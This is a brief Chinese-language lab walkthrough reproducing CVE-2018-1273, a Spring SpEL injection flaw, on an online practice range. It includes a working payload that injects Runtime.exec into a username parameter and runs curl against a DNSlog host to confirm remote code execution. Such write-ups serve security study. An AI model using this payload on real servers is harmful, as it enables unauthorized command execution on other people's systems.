[Vulfocus解题系列]spring 代码执行 (CVE-2018-1273)
简介Spring Expression Language是一个功能强大的表达式 语言支持查询和在运行时操作一个对象图。 攻击者可以在未获得授权的情况下,将精心制作的请求参数注入到存在该漏洞的服务器上,从而发起远程代码执行攻击。复现过程使用在线靶场抓包改包,将data数据改为下面的payloadusername[#this.getClass().forName("java.lang.Runtime"
·
简介
Spring Expression Language是一个功能强大的表达式 语言支持查询和在运行时操作一个对象图。 攻击者可以在未获得授权的情况下,将精心制作的请求参数注入到存在该漏洞的服务器上,从而发起远程代码执行攻击。
复现过程
使用在线靶场
抓包

改包,将data数据改为下面的payload
username[#this.getClass().forName("java.lang.Runtime").getRuntime().exec("curl http://m9c5f3.ceye.io/123456")]=&password=&repeatedPassword=
使用dnslog进行命令执行的验证
成功回显,证明漏洞存在
魔乐社区(Modelers.cn) 是一个中立、公益的人工智能社区,提供人工智能工具、模型、数据的托管、展示与应用协同服务,为人工智能开发及爱好者搭建开放的学习交流平台。社区通过理事会方式运作,由全产业链共同建设、共同运营、共同享有,推动国产AI生态繁荣发展。
更多推荐



所有评论(0)